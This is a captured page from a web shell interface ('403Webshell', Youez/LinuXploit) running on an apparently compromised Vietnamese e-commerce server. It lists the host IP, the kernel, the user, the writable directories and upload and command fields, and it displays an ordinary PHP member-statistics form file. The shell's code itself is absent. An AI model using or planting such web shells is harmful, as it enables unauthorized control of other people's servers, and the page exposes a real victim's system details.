403Webshell
Server IP : 103.48.194.25  /  Your IP : 216.73.217.33
Web Server : Apache/2.4.6 (CentOS) OpenSSL/1.0.2k-fips PHP/7.4.33
System : Linux VMHostDefault 3.10.0-1160.42.2.el7.x86_64 #1 SMP Tue Sep 7 14:49:57 UTC 2021 x86_64
User : sieuthimay ( 1016)
PHP Version : 8.2.20
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON  |  Sudo : ON  |  Pkexec : ON
Directory :  /var/www/thegioimaycongnghiep.vn/public_html/webadmin/views/member/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : /var/www/thegioimaycongnghiep.vn/public_html/webadmin/views/member/thongke.php
<?=form_open(uri_string())?>
<table class="form">
    <tr>
        <td class="label">Từ ngày</td>
        <td>
            <input type="text" id="tungay" name="tungay" class="w200">
        </td>
    </tr>
    <tr>
        <td class="label">Đến ngày</td>
        <td>
            <input type="text" id="denngay" name="denngay" class="w200">
        </td>
    </tr>    
    <tr>
        <td class="label">Sắp xếp theo</td>
        <td>
            <select name="order">
                <option value="FullName">Họ tên</option>
                <option value="RegisteredDate">Ngày đăng ký</option>
                <option value="PhoneNumber">Số điện thoại</option>
            </select>
            <select name="order_type">
                <option value="desc">Giảm dần</option>
                <option value="asc">Tăng dần</option>
            </select>
        </td>
    </tr>
    <tr>
        <td colspan="2"><input type="submit" name="bt_submit" value="Thống kê"></td>
    </tr>    
</table>
<?=form_close();?>
<script>
    $(function() {
        var dates = $( "#tungay, #denngay" ).datepicker({

            changeMonth: true,
            dateFormat: 'yy-mm-dd', 
            numberOfMonths: 1,
            onSelect: function( selectedDate ) {
                var option = this.id == "tungay" ? "minDate" : "maxDate",
                    instance = $( this ).data( "datepicker" );
                    date = $.datepicker.parseDate(
                        instance.settings.dateFormat ||
                        $.datepicker._defaults.dateFormat,
                        selectedDate, instance.settings );
                dates.not( this ).datepicker( "option", option, date );
            }
        });
    });
</script>

Youez - 2016 - github.com/yon3zu
LinuXploit